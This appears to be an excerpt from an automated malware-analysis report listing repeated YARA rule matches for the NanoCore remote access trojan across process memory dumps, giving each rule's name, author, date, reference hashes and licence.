      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
